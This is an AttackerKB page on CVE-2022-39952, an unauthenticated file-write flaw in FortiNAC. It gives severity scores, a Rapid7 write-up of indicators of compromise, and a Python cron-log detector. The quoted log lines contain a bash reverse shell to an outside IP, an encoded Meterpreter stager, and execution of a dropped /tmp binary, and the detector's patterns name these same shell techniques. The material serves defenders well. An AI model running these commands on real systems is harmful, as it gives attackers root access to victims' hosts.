AttackerKB AKB:271B7529-C30E-4293-83DC-9F0303D1074F
History: Feb 16, 2023 - 12:00 a.m.

CVE-2022-39952

attackerkb.com

CVSS3: 9.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS2: 7.5 High
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS: 0.904 High
Percentile: 98.5%

An external control of file name or path in Fortinet FortiNAC versions 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, 8.3.7 may allow an unauthenticated attacker to execute unauthorized code or commands via a specifically crafted HTTP request.

Recent assessments:

jheysel-r7 at March 08, 2023 9:51pm UTC reported:

This vulnerability is an arbitrary file write in the configurationWizard/keyUpload.jsp endpoint. The arbitrary file write results in unauthenticated remote code execution in the context of the root user.

A FortiNAC device provides protection against IoT threats, extends control to third-party devices, and orchestrates automatic responses to a wide range of networking events… Despite these devices not having much of an internet facing footprint, if an attacker already inside your network gains root access to this device it will provide a great starting point to corrode the integrity of the rest of your network. Exploitation is trivial.

IOCs

The original PoC as well as the Metasploit module both use the arbitrary file write to drop a cron job (inside /etc/cron.d/) that initiates a reverse shell as the root user.

A target compromised by the original PoC would have a log line in /var/log/cron similar to:

Mar  8 11:40:01 localhost CROND[17120]: (root) CMD (bash -i >& /dev/tcp/192.168.123.1/4444 0>&1)

Whereas a target compromised by the Metasploit module will leave slightly different log lines in /var/log/cron depending on the Meterpreter session returned.

Python Meterpreter:

Mar  8 15:44:01 localhost CROND[11377]: (root) CMD (python /tmp/gSYDIjeD 0>&1)
Mar  8 15:44:03 localhost CROND[8878]: (root) CMDOUT (Traceback (most recent call last):)
Mar  8 15:44:03 localhost CROND[8878]: (root) CMDOUT (  File "/tmp/gSYDIjeD", line 1, in <module>)
Mar  8 15:44:03 localhost CROND[8878]: (root) CMDOUT (    exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNo9UE1LxDAQPTe/IrdkMIamxrIuVhDxICKCuzeRpU1HLU3TkmS1Kv53N3TxMsN78+bNRzdMo480jKbHKL5t14imDlhqEaLfmyhiNyB5HT2daeeor90bcpXDmmTRfx1iFqqlWS6JF+KIN48397vN9un2+gGSTprROTSRc6YuCqnKlVTFmVRMaK1zSJrGY92TDGeDU0zmaboMFnHi50BstSwl926qTc/Z1R0TQXo0H1wDPOcvpK2O2AL5fO8sUouOt3BpD3btyX/1dKGB4IyGp7tli2YcJo8h8OUFsil1IltMSvHDAluHXyB/G3tfLA==')[0]))))
Mar  8 15:44:03 localhost CROND[8878]: (root) CMDOUT (  File "<string>", line 9, in <module>)

Linux Meterpreter:

Mar  8 15:46:01 localhost CROND[11595]: (root) CMD (chmod +x /tmp/vprwoPAh && /tmp/vprwoPAh 0>&1)

Of course, logs and the cron job files themselves can be cleaned up once root access is gained. In addition, there are also different ways to achieve RCE from an arbitrary file write. During testing I was able to drop a .jsp payload in the application webroot, although once triggered it returned a shell in the context of the user running the application and not the root user. Just be aware there could be IOCs outside /var/log/cron.
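A small detector over the cron log lines quoted in the assessment above, added here as an example that is not part of the assessment, the original PoC or the Metasploit module: it parses CROND entries and flags root jobs that match the indicators the post describes (a /dev/tcp redirection, execution of a file dropped in /tmp, an inline chmod +x). The sample log is constructed from the quoted lines plus one benign job, and the indicator list is an assumption rather than a published signature.

```python
import re
from typing import Dict, List, Optional

# Constructed sample: the three CMD lines quoted in the assessment, one CMDOUT line, one benign job.
SAMPLE_LOG = """\
Mar  8 11:40:01 localhost CROND[17120]: (root) CMD (bash -i >& /dev/tcp/192.168.123.1/4444 0>&1)
Mar  8 15:44:01 localhost CROND[11377]: (root) CMD (python /tmp/gSYDIjeD 0>&1)
Mar  8 15:44:03 localhost CROND[8878]: (root) CMDOUT (Traceback (most recent call last):)
Mar  8 15:46:01 localhost CROND[11595]: (root) CMD (chmod +x /tmp/vprwoPAh && /tmp/vprwoPAh 0>&1)
Mar  8 16:00:01 localhost CROND[12001]: (root) CMD (run-parts /etc/cron.hourly)
"""

# Shape of a CROND line in /var/log/cron: timestamp, host, CROND[pid]: (user) CMD|CMDOUT (body)
CROND_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"CROND\[(?P<pid>\d+)\]: \((?P<user>[^)]+)\) (?P<kind>CMD|CMDOUT) \((?P<body>.*)\)$"
)

# Assumed indicator set: (reason shown to the analyst, regex applied to the scheduled command).
INDICATORS = [
    ("bash /dev/tcp or /dev/udp redirection (reverse shell)", re.compile(r"/dev/(tcp|udp)/")),
    ("executes a file dropped in /tmp", re.compile(r"(^|\s|&&\s*)/tmp/\S+")),
    ("marks a file executable inline (chmod +x)", re.compile(r"\bchmod\s+\+x\b")),
    ("stdin redirected to stdout (interactive shell idiom)", re.compile(r"0>&1")),
]

def parse_cron_line(line: str) -> Optional[Dict[str, str]]:
    """Return the fields of one CROND log line, or None if the line is not one."""
    m = CROND_RE.match(line.strip())
    return m.groupdict() if m else None

def suspicious_reasons(command: str) -> List[str]:
    """List every indicator the scheduled command matches (empty for a benign job)."""
    return [reason for reason, rx in INDICATORS if rx.search(command)]

def scan_cron_log(text: str) -> List[Dict[str, object]]:
    """Keep CMD entries that match an indicator; CMDOUT lines are job output, not jobs."""
    findings = []
    for line in text.splitlines():
        rec = parse_cron_line(line)
        if not rec or rec["kind"] != "CMD":
            continue
        reasons = suspicious_reasons(rec["body"])
        if reasons:
            findings.append({"pid": int(rec["pid"]), "user": rec["user"], "command": rec["body"], "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in scan_cron_log(SAMPLE_LOG):
        print(f"CROND[{f['pid']}] ({f['user']}) {f['command']!r}: {', '.join(f['reasons'])}")
```

Feed it a real /var/log/cron (or journald output filtered to CROND) instead of SAMPLE_LOG; as the post notes, an absent hit is not proof of a clean host, since the log and the /etc/cron.d file can be removed after access.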

ccondon-r7 at February 23, 2023 5:13pm UTC reported:


cbeek-r7 at February 22, 2023 8:57am UTC reported:


Assessed Attacker Value: 4
Assessed Attacker Value: 4
Assessed Attacker Value: 5
